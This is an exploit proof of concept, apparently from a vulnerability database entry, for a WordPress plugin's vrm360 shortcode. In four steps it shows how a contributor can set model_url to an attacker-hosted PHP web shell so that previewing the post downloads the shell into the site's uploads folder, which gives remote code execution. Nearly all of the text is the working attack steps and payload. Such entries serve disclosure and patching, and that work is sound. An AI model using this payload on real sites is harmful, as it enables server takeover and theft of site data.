## https://sploitus.com/exploit?id=WPEX-ID:21950116-1A69-4848-9DA0-E912096C0FCE
1. Host a webserver with a shell named `webshell.zip.php`
2. As a contributor, add the shortcode: `[vrm360 canvas_name=s1 model_url=http://ATTACKER_HOST/webshell.zip.php aspect_ratio=1.8 initial_offset=0.9]`
3. Press "Preview" > "Preview in new tab"
4. See that the file has been uploaded to https://example.com/wp-content/uploads/tmp/webshell.zip.php